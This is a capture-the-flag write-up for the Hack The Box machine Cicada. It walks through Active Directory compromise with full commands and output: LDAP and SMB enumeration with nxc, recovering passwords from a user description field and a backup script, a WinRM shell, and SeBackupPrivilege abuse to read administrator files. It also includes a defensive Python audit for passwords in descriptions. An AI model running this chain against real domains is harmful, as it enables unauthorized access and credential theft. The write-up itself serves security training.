jamarir@kali:~$ nxc ldap 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -M get-desc-users
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.35 389 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
GET-DESC... 10.10.11.35 389 CICADA-DC [+] Found following users:
GET-DESC... 10.10.11.35 389 CICADA-DC User: Administrator description: Built-in account for administering the computer/domain
GET-DESC... 10.10.11.35 389 CICADA-DC User: Guest description: Built-in account for guest access to the computer/domain
GET-DESC... 10.10.11.35 389 CICADA-DC User: krbtgt description: Key Distribution Center Service Account
GET-DESC... 10.10.11.35 389 CICADA-DC User: david.orelious description: Just in case I forget my password is aRt$Lp#7t*VQ!3
And actually, I should have looked closer at my previous all_users.txt file above...
jamarir@kali:~$ grep 'description' all_users.txt
LDAP 10.10.11.35 389 CICADA-DC description: Built-in account for administering the computer/domain
LDAP 10.10.11.35 389 CICADA-DC description: Built-in account for guest access to the computer/domain
LDAP 10.10.11.35 389 CICADA-DC description: Key Distribution Center Service Account
LDAP 10.10.11.35 389 CICADA-DC description: Just in case I forget my password is aRt$Lp#7t*VQ!3
Anyway, we can impersonate cicada.htb\david.orelious:aRt$Lp#7t*VQ!3!
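As an added example (not part of the write-up), the same check from the defender's side: a Python audit that flags user descriptions containing a password keyword or a high-complexity token, run over a constructed list of (sAMAccountName, description) pairs mirroring the get-desc-users output above, as an auditor would get them from an LDAP search.

```python
import re

# Keyword hint: the description talks about a password or credential
KEYWORDS = re.compile(r"\b(pass(?:word|wd)?|pwd|secret|credential)s?\b", re.IGNORECASE)
CLASSES = (r"[a-z]", r"[A-Z]", r"\d", r"[^A-Za-z0-9]")


def looks_like_secret(token: str) -> bool:
    """True for a token of 8+ chars mixing at least three character classes,
    one of them digits (so ordinary words such as 'Built-in' are not flagged)."""
    if len(token) < 8 or not re.search(r"\d", token):
        return False
    return sum(bool(re.search(p, token)) for p in CLASSES) >= 3


def audit_descriptions(users):
    """users: iterable of (sAMAccountName, description-or-None).
    Returns [(sAMAccountName, [reasons])] for the accounts worth a closer look."""
    findings = []
    for sam, desc in users:
        if not desc:
            continue
        reasons = []
        if KEYWORDS.search(desc):
            reasons.append("password keyword")
        if any(looks_like_secret(tok) for tok in desc.split()):
            reasons.append("high-complexity token")
        if reasons:
            findings.append((sam, reasons))
    return findings


# Constructed sample mirroring the descriptions shown by get-desc-users above
SAMPLE_USERS = [
    ("Administrator", "Built-in account for administering the computer/domain"),
    ("Guest", "Built-in account for guest access to the computer/domain"),
    ("krbtgt", "Key Distribution Center Service Account"),
    ("john.smoulder", None),
    ("david.orelious", "Just in case I forget my password is aRt$Lp#7t*VQ!3"),
]

if __name__ == "__main__":
    for sam, reasons in audit_descriptions(SAMPLE_USERS):
        print(f"{sam}: {', '.join(reasons)}")
```

Where this fires, clear the attribute and rotate the credential; the description field is readable by every authenticated domain user, as the write-up shows.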
emily.oscars can read a backup u said ?!
david.orelious has access to the DEV share:
jamarir@kali:~$ nxc smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' -d cicada.htb --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV READ
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server share
Then, we may dump this share (excluding all the others) via the spider_plus module in nxc:
jamarir@kali:~$ nxc smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' -d cicada.htb -M spider_plus -o OUTPUT_FOLDER='nxc_spider_plus' DOWNLOAD_FLAG='True' EXCLUDE_FILTER='PRINT$,IPC$,SYSVOL' EXCLUDE_EXTS='ico,lnk,svg'
jamarir@kali:~$ tree nxc_spider_plus
nxc_spider_plus
├── 10.10.11.35
│ ├── DEV
│ │ └── Backup_script.ps1
│ └── HR
│ └── Notice from HR.txt
└── 10.10.11.35.json
Unsurprisingly, the PowerShell script contains juicy information (hard-coded credentials)!
jamarir@kali:~$ cat nxc_spider_plus/10.10.11.35/DEV/Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
Finally, we can confirm that emily.oscars belongs to the Remote Management Users group, and therefore access WinRM with the credentials emily.oscars:Q!3@Lp#M6b*7t*Vt:
jamarir@kali:~$ nxc ldap 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' -M group-mem -o GROUP="Remote Management Users"
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.35 389 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
GROUP-MEM 10.10.11.35 389 CICADA-DC [+] Found the following members of the Remote Management Users group:
GROUP-MEM 10.10.11.35 389 CICADA-DC emily.oscars
The user flag is:
jamarir@kali:~$ evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> type ../desktop/user.txt
b0[...]8b
Administrator
emily.oscars has SeBackupPrivilege u said ?!
Back to our bloody (BloodHound) stuff, we see that emily.oscars is a member of the privileged domain group Backup Operators.
This user therefore holds the SeBackupPrivilege right, which lets it read any file on the filesystem regardless of its ACL (backup semantics), for example with robocopy's backup mode (/B):
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> robocopy /B C:/Users/Administrator/Desktop/ ./
Note that the Blackfield machine presents the same vulnerability. The attack was presented by the irreplaceable ippsec.
GG WP !
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> type root.txt
88[...]63
Written by jamarir
Jamaledine AMARIR. Pentester, CTF Player, Game Modding enthusiast | CRTO